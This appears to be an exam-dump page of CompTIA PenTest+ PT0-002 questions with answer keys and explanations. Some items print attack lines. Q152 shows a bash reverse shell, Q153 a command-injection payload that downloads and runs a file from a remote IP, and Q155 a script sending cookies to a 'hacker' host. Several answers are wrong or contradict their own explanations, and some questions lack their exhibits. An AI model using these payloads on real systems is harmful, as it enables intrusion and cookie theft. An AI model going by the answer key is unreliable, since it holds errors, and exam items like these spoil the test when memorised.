Pass CompTIA PT0-002 exam Dumps 100 Pass Guarantee With Latest Demo
The PT0-002 PDF Dumps Greatest for the CompTIA Exam Study Guide!
NEW QUESTION # 147
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:
Which of the following tools will help the tester prepare an attack for this scenario?
- A. Burp Suite and DIRB
- B. Nmap and OWASP ZAP
- C. Hydra and crunch
- D. Netcat and cURL
Answer: A
NEW QUESTION # 148
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?
- A. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
- B. The reverse-engineering team may have a history of selling exploits to third parties.
- C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
- D. The reverse-engineering team will be given access to source code for analysis.
Answer: D
NEW QUESTION # 149
A penetration tester performs the following command:
curl -I -http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
- A. Option A
- B. Option B
- C. Option D
- D. Option C
Answer: A
Explanation:
Reference: https://research.securitum.com/http-2-protocol-it-is-faster-but-is-it-also-safer/
NEW QUESTION # 150
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?
- A. dig
- B. tcpdump
- C. Scapy
- D. Socat
Answer: D
NEW QUESTION # 151
In Java and C/C++, variable initialization is critical because:
- A. the compiler will assign null to the variable, which will cause warnings and errors.
- B. the variable will not have an object type assigned to it.
- C. the unknown value, when used later, will cause unexpected behavior.
- D. the initial state of the variable creates a race condition.
Answer: C
Explanation:
Variable initialization is the process of assigning a value to a variable at the time of declaration. In Java and C/C++, variable initialization is critical because if a variable is not initialized, it may contain a garbage value that is unpredictable and may lead to erroneous results or runtime errors when the variable is used later in the program. For example, if a variable is used in a mathematical expression or a conditional statement, the outcome may depend on the value of the variable. If the variable is not initialized, the outcome may be different each time the program is run, or the program may crash due to an invalid operation. Therefore, it is a good practice to always initialize variables before using them, or to check if they have been initialized before using them123. Reference:
* Different Ways to Initialize a Variable in C++, GeeksforGeeks article by Anshul Aggarwal
* Static variable initialization?, Stack Overflow answer by Pawe Hajdan
* A Guide to Java Initialization, Baeldung article by Eugen Paraschiv
NEW QUESTION # 152
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
- A. powershell -exec bypass -f \\10.10.51.50\9891
- B. bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
- C. wget 10.10.51.50:9891/exploit
- D. nc 10.10.51.50 9891 < exploit
Answer: C
Explanation:
Reference: https://www.redhat.com/sysadmin/simple-http-server
NEW QUESTION # 153
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?
- A. taskkill /IM "apache" /F
- B. grep -v apache ~/.bash_history > ~/.bash_history
- C. chmod 600 /tmp/apache
- D. rm -rf /tmp/apache
Answer: D
Explanation:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1
chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.
NEW QUESTION # 154
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?
- A. Kismet
- B. Wifite
- C. Wireshark
- D. Aircrack-ng
Answer: D
Explanation:
Aircrack-ng is a suite of tools that allows the penetration tester to test the effectiveness of the wireless IDS solutions by performing various attacks on wireless networks, such as cracking WEP and WPA keys, capturing and injecting packets, deauthenticating clients, or creating fake access points. Aircrack-ng can also generate different types of traffic and signatures that can trigger the wireless IDS alerts or responses, such as ARP requests, EAPOL frames, or beacon frames.
Reference: https://purplesec.us/perform-wireless-penetration-test/
NEW QUESTION # 155
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
- A. Web-application firewall
- B. Input validation
- C. Parameterized queries
- D. Output encoding
- E. Session tokens
- F. Base64 encoding
Answer: B,D
Explanation:
Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the < string when writing to an HTML page.
NEW QUESTION # 156
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
- A. Look for open ports.
- B. Create an encrypted tunnel.
- C. Attempt to flood open ports.
- D. Listen for a reverse shell.
Answer: A
Explanation:
Explanation
The script will perform a port scan on the target IP address, looking for open ports on a list of common ports.
A port scan is a technique that probes a network or a system for open ports, which can reveal potential vulnerabilities or services running on the host.
NEW QUESTION # 157
A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following:
Which of the following should the penetration tester do NEXT?
- A. Contact the client immediately.
- B. Note this finding for inclusion in the final report.
- C. Investigate the high numbered port connections.
- D. Close the reverse shell the tester is using.
Answer: C
Explanation:
The image shows the output of the netstat -antu command, which displays active internet connections for the TCP and UDP protocols. The output shows that there are four established TCP connections and two listening UDP connections on the host. The established TCP connections have high numbered ports as their local addresses, such as 49152, 49153, 49154, and 49155. These ports are in the range of ephemeral ports, which are dynamically assigned by the operating system for temporary use by applications or processes. The foreign addresses of these connections are also high numbered ports, such as 4433, 4434, 4435, and 4436. These ports are not well-known or registered ports for any common service or protocol. The combination of high numbered ports for both local and foreign addresses suggests that these connections are suspicious and may indicate a backdoor or a covert channel on the host. Therefore, the penetration tester should investigate these connections next to determine their nature and purpose. The other options are not appropriate actions for the penetration tester at this stage.
NEW QUESTION # 158
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:
Which of the following would be the BEST command to use for further progress into the targeted network?
- A. ssh 127.0.0.1 5555
- B. nc 10.10.1.2
- C. ssh 10.10.1.2
- D. nc 127.0.0.1 5555
Answer: D
NEW QUESTION # 159
After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:
Which of the following attacks is the penetration tester most likely trying to perform?
- A. Credential harvesting
- B. Metadata service attack
- C. Resource exhaustion
- D. Container escape techniques
Answer: B
Explanation:
The penetration tester is most likely trying to perform a metadata service attack, which is an attack that exploits a vulnerability in the metadata service of a cloud provider. The metadata service is a service that provides information about the cloud instance, such as its IP address, hostname, credentials, user data, or role permissions. The metadata service can be accessed from within the cloud instance by using a special IP address, such as 169.254.169.254 for AWS, Azure, and GCP. The commands that the penetration tester runs are curl commands, which are used to transfer data from or to a server. The curl commands are requesting data from the metadata service IP address with different paths, such as /latest/meta-data/iam/security-credentials/ and /latest/user-data/. These paths can reveal sensitive information about the cloud instance, such as its IAM role credentials or user data scripts. The penetration tester may use this information to escalate privileges, access other resources, or perform other actions on the cloud environment. The other options are not likely attacks that the penetration tester is trying to perform.
NEW QUESTION # 160
A penetration tester wrote the following script on a compromised system:
#!/bin/bash
network='10.100.100'
ports='22 23 80 443'
for x in {1 .. 254};
do (nc -zv $network.$x $ports );
done
Which of the following would explain using this script instead of another tool?
- A. The penetration tester wanted to persist this script to run on reboot.
- B. The configuration required the penetration tester to not utilize additional files.
- C. The Bash script will provide more thorough output.
- D. The typical tools could not be used against Windows systems.
Answer: B
NEW QUESTION # 161
Which of the following documents would be the most helpful in determining who is at fault for a temporary outage that occurred during a penetration test?
- A. Non-disclosure agreement
- B. Business associate agreement
- C. Executive summary
- D. Assessment scope and methodologies
Answer: D
Explanation:
The assessment scope and methodologies document defines the objectives, boundaries, rules of engagement, and expected outcomes of a penetration testing engagement. It also specifies the roles and responsibilities of the testers and the clients, as well as the communication channels and escalation procedures. This document can help determine who is at fault for a temporary outage that occurred during a penetration test, as it can clarify whether the outage was within the agreed scope and methodologies, or whether it was caused by a violation of the rules of engagement or a lack of coordination. Reference:
* CompTIA PenTest+ Certification Exam Objectives, Domain 1.0 Planning and Scoping, Objective 1.1: Given a scenario, explain the importance of scoping an engagement properly.
* The Official CompTIA PenTest+ Instructor and Student Guides (PT0-002), Lesson 1: Planning and Scoping Penetration Tests, Topic 1.1: Introduction to Penetration Testing Concepts, Topic 1.2: The Penetration Testing Process, Topic 1.3: Planning and Scoping Penetration Tests.
NEW QUESTION # 162
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
- A. See explanation below
Answer: A
Explanation:
Part 1 - 192.168.2.2 -O -sV --top-ports=100 and SMB vulns
Part 2 - Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting-os-and-services-running-on-a-target-host
NEW QUESTION # 163
A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?
- A. Nmap -p 445 -n -T4 -open 172.21.0.0/16
- B. Nmap -p 445 -max -sT 172. 21.0.0/16
- C. Nmap -sV --script=smb* 172.21.0.0/16
- D. Nmap -s 445 -Pn -T5 172.21.0.0/16
Answer: C
Explanation:
Explanation
The best option when stealth is not a concern and the task is time sensitive is to use the command: Nmap -sV
--script=smb* 172.21.0.0/16. This command will use version detection and SMB scripts to scan for port 445 on the given IP range. The -sV option will cause Nmap to detect the version of services running on the ports, which is helpful for identifying vulnerabilities, and the --script=smb* option will cause Nmap to run all of the SMB related scripts. The -T4 option can be used to speed up the scan, as it increases the timing probes.
NEW QUESTION # 164
A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?
- A. Successful exploits
- B. Bandwidth limitations
- C. Application failures
- D. Patch installations
Answer: A
NEW QUESTION # 165
A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.
INSTRUCTIONS
Select the tool the penetration tester should use for further investigation.
Select the two entries in the robots.txt file that the penetration tester should recommend for removal.
Answer:
Explanation:
NEW QUESTION # 166
......
Read Online PT0-002 Test Practice Test Questions Exam Dumps: https://www.examdiscuss.com/CompTIA/exam/PT0-002/
Easily To Pass New PT0-002 Premium Exam: https://drive.google.com/open?id=1l7EBiGiuNtdTZ79E9C5DOBIl1QUYr90d